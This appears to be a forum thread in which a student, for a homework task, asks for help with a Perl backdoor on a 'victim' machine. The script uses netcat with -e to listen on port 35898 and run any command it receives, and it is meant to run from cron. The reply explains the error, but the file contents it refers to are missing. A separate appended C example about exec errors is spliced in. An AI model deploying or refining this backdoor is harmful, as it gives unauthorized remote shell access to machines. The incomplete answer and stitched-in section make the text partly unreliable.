We have been asked to set up a backdoor in a victim machine for a homework assignment. I’ve gained access to the machine and I want to have the following script run on a cron, but it’s throwing an error.
I’ve verified that the @ARGV test works correctly by calling the program independently with and without the dummy run argument, but when I try and netcat into the victim machine on port 35898 after initializing the script, the following error is all I get on connection.
Error: exec /bin/vshell run failed : No such file or directory
Obviously the program exists because the program is calling itself.
Code:
#!/usr/bin/perl -w
$| = 1;
my $prompt = '$ ';
# run is just a dummy arg
if(!@ARGV){ exec("nc -e '/bin/vshell run' -l -p 35898"); die; }
while(1){
    print $prompt;
    eval {
        local $SIG{ALRM} = sub { die 'Goodbye!\n'; };
        alarm 60;
        &syscall;
        alarm 0;
    };
    if( $@ ){ die; }
}
sub syscall{
    if( defined( $_ = <STDIN> )){
        chomp;
        system( $_ );
    }
}
I’ve been at this for a while and I could really use a nudge in the right direction. Thanks!
PS: This install of nc is compiled with the security hole which allows the -e flag and I have verified this functionality on other programs.
“/bin/vshell” might exist, but “/bin/vshell run” doesn’t exist. Apparently, nc’s -e value must be the path of a file to execute. Create a file that contains
and pass the path to that instead.
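
Why the error message names "/bin/vshell run" as a missing file, shown as an added example that is not part of the original thread: an exec call that is handed a whole command line as its path looks for a file with exactly that name, spaces included, and fails with ENOENT. The helper `exec_errno` is hypothetical, `/bin/sh` stands in for the program, and the code assumes, as the answer says, that the `-e` value is used unsplit as the path.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork, call execv(path, argv) in the child, and return the errno of a
 * failed exec (0 if the exec succeeded). The errno comes back over a
 * close-on-exec pipe: a successful exec closes it without writing. */
static int exec_errno(const char *path, char *const argv[])
{
    int fds[2], err = 0;
    if (pipe(fds) != 0)
        return errno;
    pid_t pid = fork();
    if (pid < 0) { err = errno; close(fds[0]); close(fds[1]); return err; }
    if (pid == 0) {
        close(fds[0]);
        fcntl(fds[1], F_SETFD, FD_CLOEXEC);
        execv(path, argv);              /* returns only on failure */
        err = errno;
        if (write(fds[1], &err, sizeof err) < 0)
            _exit(126);
        _exit(127);
    }
    close(fds[1]);
    if (read(fds[0], &err, sizeof err) != (ssize_t)sizeof err)
        err = 0;                        /* EOF: the child was replaced */
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return err;
}

/* Whole command line used as the file name, as in the error message. */
static int exec_unsplit(void)
{
    char *argv[] = { "sh -c true", NULL };
    return exec_errno("/bin/sh -c true", argv);
}

/* Program path and its arguments kept separate. */
static int exec_split(void)
{
    char *argv[] = { "sh", "-c", "true", NULL };
    return exec_errno("/bin/sh", argv);
}

int main(void)
{
    printf("unsplit errno=%d (ENOENT=%d)\n", exec_unsplit(), ENOENT);
    printf("split   errno=%d\n", exec_split());
    return 0;
}
```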